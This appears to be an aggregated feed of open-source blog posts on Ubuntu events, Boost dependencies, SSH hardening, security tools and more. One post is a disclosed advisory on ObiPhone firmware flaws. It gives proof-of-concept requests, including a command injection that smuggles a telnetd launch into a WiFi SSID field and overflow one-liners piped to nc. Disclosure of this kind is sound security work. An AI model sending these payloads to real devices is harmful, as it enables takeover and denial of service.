Moderate Activity
I Use This!


Analyzed 29 days ago. based on code collected 4 months ago.
Posted 1 day ago
Well, hello there, people. I am back with another Bacon Roundup which summarizes some of the various things I have published recently. Don’t forget to subscribe to get the latest posts right to your inbox. Also, don’t forget that I am doing a ... [More] Reddit AMA (Ask Me Anything) on Tues 30th August 2016 at 9am Pacific. Find out the details here. Without further ado, the roundup: Building a Career in Open Source ( A piece I wrote about how to build a successful career in open source. It delves into finding opportunity, building a network, always learning/evolving, and more. If you aspire to work in open source, be sure to check it out. Cutting the Cord With Playstation Vue ( At home we recently severed ties with DirecTV (for lots of reasons, this being one), and moved our entertainment to a Playstation 4 and Playstation Vue for TV. Here’s how I did it, how it works, and how you can get in on the action. Running a Hackathon for Security Hackers ( Recently I have been working with HackerOne and we recently ran a hackathon for some of the best hackers in the world to hack popular products and services for fun and profit. Here’s what happened, how it looked, and what went down. Opening Up Data Science with ( Recently I have also been working with who are building a global platform and community for data, collaboration, and insights. This piece delves into the importance of data, the potential for, and what the future might hold for a true data community. From The Archive To round out this roundup, here are a few pieces I published from the archive. As usual, you can find more here. Using behavioral patterns to build awesome communities ( Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These traits can provide a helpful foundation in which we build human systems and communities. This piece delves into some practical ways in which you can harness behavioral economics in your community or organization. Using behavioral patterns to build awesome communities ( Human beings are pretty irrational a lot of the time, but irrational in predictable ways. These Atom: My New Favorite Code Editor ( Atom is an extensible text editor that provides a thin and sleek core and a raft of community-developed plugins for expanding it into the editor you want. Want it like vim? No worries. Want it like Eclipse? No worries. Here’s my piece on why it is neat and recommendations for which plugins you should install. Ultimate unconference survival guide ( Unconferences, for those who are new to them, are conferences in which the attendees define the content on the fly. They provide a phenomenal way to bring fresh ideas to the surface. They can though, be a little complicated to figure out for attendees. Here’s some tips on getting the most out of them. Stay up to date and get the latest posts direct to your email inbox with no spam and no nonsense. Click here to subscribe. The post Bacon Roundup – 23rd August 2016 appeared first on Jono Bacon. [Less]
Posted 2 days ago
Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04. ... [More] But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos. Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos. The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I also was able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu. Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots). After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago. Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years. Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long time LoCo member Randy Gold. They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that. Thanks to Randy for the booth photo! At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books. My co-author, José Antonio Rey, signing a copy of our book! [Less]
Posted 3 days ago
OVERLAND PARK, KANSAS, and LONDON, U.K. (August 22, 2016) – Responding to increasing demand for flexible, open source and cost-predictable cloud solutions, QTS Realty Trust, Inc. (NYSE: QTS) and Canonical (the company behind Ubuntu, the leading ... [More] operating system for container cloud, scale out, and hyperscale computing) announced today a private, fully managed OpenStack cloud solution available from any of QTS’ geographically diverse and highly secure data centers in mid-September. Built on Ubuntu OpenStack, the world’s most popular OpenStack distribution, and using Canonical’s application modeling service Juju as well as Canonical’s Bare Metal as a Service (MaaS), QTS’ private, fully managed OpenStack cloud enables enterprise customers to perform quick and easy provisioning, orchestration, and management of cloud resources. Examples include: Building software-as-a-service applications, either as new developments or as improvements upon existing solutions. Serving as a base for delivering self-service storage and service on demand to users who need IT services. Delivering object storage or block storage on demand. Saving on licensing fees associated with virtualization technologies. In addition to the Private Cloud Offering, QTS offer a public, multi-tenant pay-as-you-go OpenStack cloud solution that is self-provisioning, elastic and highly scalable. “As a leading data center and IT infrastructure services provider, QTS is focused on delivering seamless hybrid cloud hosting solutions using proven, best-in-breed platform technologies,” said Anand Krishnan, Executive Vice President, Canonical Cloud. “We are pleased to support QTS’ delivery of OpenStack solutions that combine the rapid availability and elasticity of compute resources with the security and control their enterprise customers demand to support their mission critical applications and workloads.” The new OpenStack solution is an important addition to QTS’ expanding portfolio of scalable, secure and compliant IaaS solutions and complements other QTS’ purpose-built clouds serving public sector, healthcare and enterprise workloads. “QTS OpenStack Cloud is the latest addition as we expand our Infrastructure-as-a-Service (IaaS) offerings to create a one-stop shop for flexible IaaS and hybrid IT solutions that address increasingly diverse customer requirements,” said Jon Greaves, Chief Technology Officer, QTS. “Canonical is an industry leader in OpenStack management and technologies and we look forward to working closely as we unleash OpenStack Cloud solutions across our geographically diverse platform of integrated data centers.” The fully managed cloud solution is being previewed at OpenStack East in New York City August 23-24 at Canonical booth # H12. [Less]
Posted 3 days ago
Note that this a duplicate of the advisory sent to the full-disclosure mailing list. Introduction Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The Vulnerabilities were discovered during ... [More] a black box security assessment and therefore the vulnerability list should not be considered exhaustive. Affected Devices and Versions ObiPhone 1032/1062 with firmware less than 5-0-0-3497. Vulnerability Overview Obi-1. Memory corruption leading to free() of an attacker-controlled address Obi-2. Command injection in WiFi Config Obi-3. Denial of Service due to buffer overflow Obi-4. Buffer overflow in internal socket handler Obi-5. Cross-site request forgery Obi-6. Failure to implement RFC 2617 correctly Obi-7. Invalid pointer dereference due to invalid header Obi-8. Null pointer dereference due to malicious URL Obi-9. Denial of service due to invalid content-length Vulnerability Details Obi-1. Memory corruption leading to free() of an attacker-controlled address By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault. python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80 (gdb) bt #0 0x479d8b18 in free () from root/lib/ #1 0x00135f20 in ?? () (gdb) x/5i $pc => 0x479d8b18 : ldr r3, [r0, #-4] 0x479d8b1c : sub r5, r0, #8 0x479d8b20 : tst r3, #2 0x479d8b24 : bne 0x479d8bec 0x479d8b28 : tst r3, #4 (gdb) i r r0 r0 0x41 65 Obi-2. Command injection in WiFi Config An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon. GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1 Host: foo Authorization: [omitted] Note that telnetd is now running and accessible via user “root” with no password. Obi-3. Denial of Service due to buffer overflow By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test. python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80 (gdb) bt #0 0x479dc440 in strcpy () from root/lib/ #1 0x001361c0 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) x/5i $pc => 0x479dc440 : strb r3, [r1, r2] 0x479dc444 : bne 0x479dc438 0x479dc448 : bx lr 0x479dc44c : push {r4, r5, r6, lr} 0x479dc450 : ldrb r3, [r0] (gdb) i r r1 r2 r1 0xb434df01 3023363841 r2 0xff 255 (gdb) p/x $r1+$r2 $1 = 0xb434e000 Obi-4. Buffer overflow in internal socket handler Commands to be executed by realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated, however unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user. GET /wifi?checkssid=[A*1024] HTTP/1.1 Host: foo Authorization: [omitted] (gdb) #0 0x41414140 in ?? () #1 0x0006dc78 in ?? () Obi-5. Cross-site request forgery All portions of the web interface appear to lack any protection against Cross-Site Request Forgery. Combined with the command injection vector in ObiPhone-3, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged-in to the phone. Obi-6. Failure to implement RFC 2617 correctly RFC 2617 specifies HTTP digest authentication, but is not correctly implemented on the ObiPhone. The HTTP digest authentication fails to comply in the following ways: The URI is not validated The application does not verify that the nonce received is the one it sent The application does not verify that the nc value does not repeat or go backwards GET / HTTP/1.1 Host: foo Authorization: Digest username=”admin”, realm=”a”, nonce=”a”, uri=”/”, algorithm=MD5, response=”309091eb609a937358a848ff817b231c”, opaque=””, qop=auth, nc=00000001, cnonce=”a” Connection: close HTTP/1.1 200 OK Server: OBi110 Cache-Control:must-revalidate, no-store, no-cache Content-Type: text/html Content-Length: 1108 Connection: close Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline. Obi-7. Invalid pointer dereference due to invalid header Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected. GET / HTTP/1.1 Host: foo Authorization: foo This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code. (gdb) bt #0 0x479dc438 in strcpy () from root/lib/ #1 0x00134ae0 in ?? () (gdb) x/5i $pc => 0x479dc438 : ldrb r3, [r1, #1]! 0x479dc43c : cmp r3, #0 0x479dc440 : strb r3, [r1, r2] 0x479dc444 : bne 0x479dc438 0x479dc448 : bx lr (gdb) i r r1 r1 0xffffffff 4294967295 Obi-8. Null pointer dereference due to malicious URL If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected. GET /obihai-xml HTTP/1.1 Host: foo (gdb) bt #0 0x479dc7f4 in strlen () from root/lib/ Backtrace stopped: Cannot access memory at address 0x8f6 (gdb) info frame Stack level 0, frame at 0xbef1aa50: pc = 0x479dc7f4 in strlen; saved pc = 0x171830 Outermost frame: Cannot access memory at address 0x8f6 Arglist at 0xbef1aa50, args: Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50 (gdb) x/5i $pc => 0x479dc7f4 : ldr r2, [r1], #4 0x479dc7f8 : ands r3, r0, #3 0x479dc7fc : rsb r0, r3, #0 0x479dc800 : beq 0x479dc818 0x479dc804 : orr r2, r2, #255 ; 0xff (gdb) i r r1 r1 0x0 0 Obi-9. Denial of service due to invalid content-length Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed” though it does not appear any attempt to update the firmware with the posted data occurred. POST / HTTP/1.1 Host: foo Content-Length: -1 Foo This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application. (gdb) bt #0 0x00138250 in HTTPD_msg_proc () #1 0x00070138 in ?? () (gdb) x/5i $pc => 0x138250 : strb r1, [r3, r2] 0x138254 : ldr r1, [r4, #24] 0x138258 : ldr r0, [r4, #88] ; 0x58 0x13825c : bl 0x135a98 0x138260 : ldr r0, [r4, #88] ; 0x58 (gdb) i r r3 r2 r3 0xafcc7000 2949410816 r2 0xffffffff 4294967295 Mitigation Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer. Author The issues were discovered by David Tomaschik of the Google Security Team. Timeline 2016/05/12 - Reported to ObiHai 2016/05/12 - Findings Acknowledged by ObiHai 2016/05/20 - ObiHai reports working on patches for most issues 2016/06/?? - New Firmware posted to ObiHai Website 2016/08/18 - Public Disclosure [Less]
Posted 3 days ago
A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area, and want to interface to the WMATA data. As a proof of concept, I wrote a yo bot called @WMATA, where it returns the closest ... [More] station if you Yo it your location. For hilarity, feel free to Yo it from outside DC. For added fun, and puns, I wrote a dbus proxy for the API as weel, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is. I’d love help with this (or pointers on how to learn how to do this right). [Less]
Posted 3 days ago
Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here along with dot files for generating ... [More] the images. The monster diagram is here: Edges and Incidental Modules and Packages The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow. In practice, packagers do not split Boost into packages like that. At least for debian packages they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package libboost1.58-dev. Perhaps the reason for packagers putting it all together is that there is little value in splitting the header-only repository content in the monolithic Boost from each other if it will all be packaged anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher level libraries (if at all). Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules‘. The name is inspired by ‘incidental data structures’ which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages. As far as I am aware such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer, and it wouldn’t affect how Boost is packaged. My script for generating the dependency information is simply grepping through the include/ directory of each repository and recording the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost because Hana includes code for integration with existing Boost code. Dependency Analysis and Reduction One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways which some in Boost prefer – it is surprisingly fuzzy). That is useful for documentation at least, but as evidenced it appears to not be useful from a packaging point of view. So, are these diagrams useful for anything? While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract. Note also that these edges do not contribute time to your slow build – reducing edges in the graphs by moving files won’t make anything faster. Rewriting the implementation of certain things might, but that is not what we are talking about here. I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size. Such a ‘subset distribution’ doesn’t need any of those. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end: $ bcp --boost=$HOME/dev/src/boost icl myicl $ rm -rf boostdir/libs/icl/{doc,test,example} $ rm -rf boostdir/boost/mpl/aux_/preprocessed $ du -hs myicl/ 15M myicl/ Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram you can see that it is quite large. Why does ICL depend on ‘incidental spirit’? Can that dependency be removed? For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. Too see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check if it is the one responsible for the dependency edge. boost/libs/icl$ git grep -Pl -e include --and \ -e "thread|spirit|pool|serial|date_time" include/ include/boost/icl/gregorian.hpp include/boost/icl/ptime.hpp Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers. I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis. Other files in ICL do not include them. boost/libs/icl$ git grep -l gregorian include/ include/boost/icl/gregorian.hpp boost/libs/icl$ git grep -l ptime include/ include/boost/icl/ptime.hpp As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set and icl::interval_map. So, I can simply delete those files. boost/libs/icl$ git grep -l -e include \ --and -e date_time include/boost/icl/ | xargs rm boost/libs/icl$ and run the bcp tool again. $ bcp --boost=$HOME/dev/src/boost icl myicl $ rm -rf myicl/libs/icl/{doc,test,example} $ rm -rf myicl/boost/mpl/aux_/preprocessed $ du -hs myicl/ 12M myicl/ I’ve saved 3M just by understanding the dependencies a bit. Not bad! Mostly the size difference is accounted for by no longer extracting boost::mpl::vector, and secondly the Boost.DateTime headers themselves. The dependencies in the graph are now so few that we can consider them and wonder why they are there and can they be removed. For example, there is a dependency on the Boost.Container repository. Why is that? include/boost/icl$ git grep -C2 -e include \ --and -e boost/container #if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION) # include #elif defined(ICL_USE_STD_IMPLEMENTATION) # include -- #if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION) # include # include #elif defined(ICL_USE_STD_IMPLEMENTATION) # include -- #if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION) # include #elif defined(ICL_USE_STD_IMPLEMENTATION) # include So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not. If we were talking about C++ code here we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common. I know that I’m not defining that and I don’t need Boost.Container, so I can hack the code to remove those includes, eg: index 6f3c851..cf22b91 100644 --- a/include/boost/icl/map.hpp +++ b/include/boost/icl/map.hpp @@ -12,12 +12,4 @@ Copyright (c) 2007-2011: -#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION) -# include -# include -#elif defined(ICL_USE_STD_IMPLEMENTATION) # include # include -#else // Default for implementing containers -# include -# include -#endif This and following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph. I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library. You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go. Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete the ptime.hpp or gregorian.hpp etc because bcp wouldn’t find them in the first place. It would still find the Boost.Container etc includes which appear in the ICL repository however. In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of. Examining Proposed Standard Libraries We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost. Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph. Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency: I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph. Using a bcp-extracted library with Modern CMake After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. Here is the modern way to do that: add_library(boost_mpl INTERFACE) target_compile_definitions(boost_mpl INTERFACE BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS ) target_include_directories(boost_mpl INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/myicl" ) add_library(boost_icl INTERFACE) target_link_libraries(boost_icl INTERFACE boost_mpl) target_include_directories(boost_icl INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include" ) add_library(boost::icl ALIAS boost_icl) # Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and obsolete, but they will remain and they are used by default when using GCC and that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro. By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources. MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries. The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem: target_link_libraries(myexe boost_icl) target_link_libraries(myexe boost::icl) # Using the ALIAS version has a different effect however: If the boost::icl target does not exist an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name and ALIAS makes that possible for any library. [Less]
Posted 3 days ago
Si eres una persona que te gusta utilizar WordPress y te llega a salir este pequeño detalle (Abort Class-pclzip.php : Missing Zlib) cuando estás importante un Slider de Revolution Slider, no te preocupes, la solución es la siguiente: Debes editar ... [More] el archivo que se encuentra dentro de la carpeta wp-admin/includes/: sudo nano /carpetadondeseencuentresusitio/wp-admin/includes/class-pclzip.php Encontrar la linea if (!function_exists(‘gzopen’)) y reemplazar gzopen por gzopen64. Con ese pequeño cambio podrás seguir utilizando sin ningún problema el plugin. Ahora, ¿Porqué da ese error?, en las últimas versiones de Ubuntu gzopen (función de PHP que nos permite abrir un archivo comprimido en .gz), solo está incluido para arquitectura de 64bits, es por esta razón que es necesario reemplazar gzopen por gzopen64 para que podamos importar todos esos archivos que se encuentran comprimido a través de este tipo de formato. Happy Hacking! [Less]
Posted 4 days ago by (Valorie Zimmerman)
Hello, if you are reading this, and have a some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney.In India, where they live, the resources all seem stacked against her. I've tried to help, and hope ... [More] you will too.Himanshu says, Hi, I recently started an online crowd funding campaign to help my mother with legal funds who is in the middle of divorce and domestic violence case. support and share this message. Thanks. [Less]
Posted 4 days ago
I was setting up some wargame boxes for a private group and wanted to reduce the risk of malfeasence/abuse from these boxes. One option, used by many public wargames, is locking down the firewall. While that’s a great start, I decided to go one ... [More] step further and prevent directly logging in as the wargame users, requiring that the users of my private wargames have their own accounts. Step 1: Setup the Private Accounts This is pretty straightforward: create a group for these users that can SSH directly in, create their accounts, and setup their public keys. # groupadd sshusers # useradd -G sshusers matir # su - matir $ mkdir -p .ssh $ echo 'AAA...' > .ssh/authorized_keys Step 2: Configure PAM This will setup PAM to define who can log in from where. Edit /etc/security/access.conf to look like this: # /etc/security/access.conf + : (sshusers) : ALL + : ALL : - : ALL : ALL This allows sshusers to log in from anywhere, and everyone to log in locally. This way, users allowed via SSH log in, then port forward from their machine to the wargame server to connect as a level. Edit /etc/pam.d/sshd to use this by uncommenting (or adding) a line: account required nodefgroup Step 3: Configure SSHD Now we’ll configure SSHD to allow access as needed: passwords locally, keys only from remote hosts, and make sure we use pam. Ensure the following settings are set: UsePAM yes Match Host ! PasswordAuthentication no Step 4: Test Restart sshd and you should be able to connect remotely as any user in sshusers, but not any other user. You should also be able to port forward and check then connect with a username/password through the forwarded port. [Less]
Posted 5 days ago
One of my friends was recently asking me about some of the tools I use, particularly for security assessments. While I can’t give out all of these things for free Oprah-style, I did want to take a moment to share some of my favorite security- and ... [More] technology-related tools, services and resources. Hardware My primary laptop is a Lenovo T450s. For me, it’s the perfect mix of weight and processing power – configured with enough RAM, the i5-5200U has no trouble running 2 or 3 VMs at the same time, and with an internal 3-cell battery plus a 6-cell battery pack, it will go all day without an outlet. (Though not necessarily under 100% CPU load.) Though Lenovo no longer sells this, having replaced it with the T460s, it’s still available on Amazon. The USB 3.0 dual gigabit ethernet interface allows one to perform ethernet bridging or routing across it, while still having the built-in interface to connect to the internet. If you don’t have a built-in interface, it still gives you two interfaces to play with. Each interface is an ASIX AX88179 chip, and you’ll also see a VIA Labs, Inc. Hub appear when you connect it, giving some idea of how the device is implemented: a USB 3.0 hub, plus two USB 3.0 to GigE PHY chips. I haven’t benchmarked the interface (maybe I will soon) but for the cases I’ve used it for – mostly a passive MITM to observe traffic on embedded devices – it’s been much more than sufficient. The WiFi Pineapple Nano is probably best known for its Karma trickery to impersonate other wireless networks, but this dual radio device is so much more. You can use it to connect one radio to a network and the other to share out WiFi, so you only have to pay for one connected device. In fact, you can put OpenVPN on it when doing this, so all your traffic (even on devices that don’t support a VPN, like a Kindle) is encrypted across the network. (Use WPA2 with a good passphrase on the client side if you want to have some semblance of privacy there.) The LAN Turtle is essentially a miniature ARM computer with two network interfaces. One of those interfaces is connected to a USB-to-Ethernet adapter, resulting in the entire device looking like an oversized USB-to-Ethernet adapter. You can plug this inline to a computer via USB and have an active MITM on the network, all powered from the USB port it’s plugged into. This is a stealthy drop box for access on an assessment. (I haven’t tried, but I imagine you can power it from a wall-wart and just plug in the wired interface if all if you need is a single network connection.) My biggest complaint about this device is that it, like all of the Hak5 hardware, is really not that open. I haven’t been able to build my own firmware for it, which I’d like to do, rather than just using the packages available in the default LAN Turtle firmware. The ALFA AWUS036NH WiFi Adapter is the 802.11b/g/n version of the popular ALFA WiFi radios. It can go up to 2000 mW, but the legal limit in the USA is 1000 mW (30 dBm), and even at that power, you’re driving further than you can hear with most antennas. I like this package because it comes with a high-gain 7 dBi panel antenna and a suction cup mount, allowing you to place the adapter in the optimal position. Just in case that’s not enough, you can get a 13 dBi yagi to extend both your transmit and receive range even further. Great for demonstrating that a client can’t depend on physical distance to protect their wireless network. Books Oh man, I could go on for a while on books… I’m going to try to focus on just the highlights. There’s a number of books containing collections of anecdotes and stories that help to develop an attacker mindset, where you begin to think and understand as attackers do, preparing you to see things in a different light: Stealing the Network The Art of Deception The Art of Intrusion Dissecting the Hack Geek Mafia (and Geek Mafia: Mile Zero and Geek Mafia: Black Hat Blues) For Assessments, Penetration Testing, and other Offensive Security practices, there’s a huge variety of resources. While books do tend to become outdated quickly in this industry, the fundamentals don’t change that often, and it’s important to understand the fundamentals before moving on to the more advanced topics of discussion. While I strongly prefer eBooks (they’re lighter, go with me everywhere, and can be searched easily), one of my coworkers swears by the printed material – take your pick and do whatever works for you. Red Team Field Manual: RTFM – A quick reference to commands and techniques across a variety of platforms. The Web Application Hacker’s Handbook – The definitive guide to web application assessment. Hacking: The Art of Exploitation – A great introduction to memory corruption vulnerabilities. Metasploit: The Penetration Tester’s Guide – The best written material I’ve seen for using Metasploit on a Penetration Test. I’m not much of a blue teamer, so I’m hard pressed to suggest the “must have” books for that side of the house. Services I have to start with DigitalOcean. Not only is this blog hosted on one of their VPS, but I do a lot of my testing and research on their VPSs. Whenever I need a quick VM, I can spin one up there for under 1 cent per hour. I’ve had nearly perfect uptime (my own stupidity outweighs their outages at least 10 to 1) and on the rare occasion I’ve needed their support, it’s been absolutely first rate. DigitalOcean started off for developers, but they offer a great production-quality product for almost any use. [Less]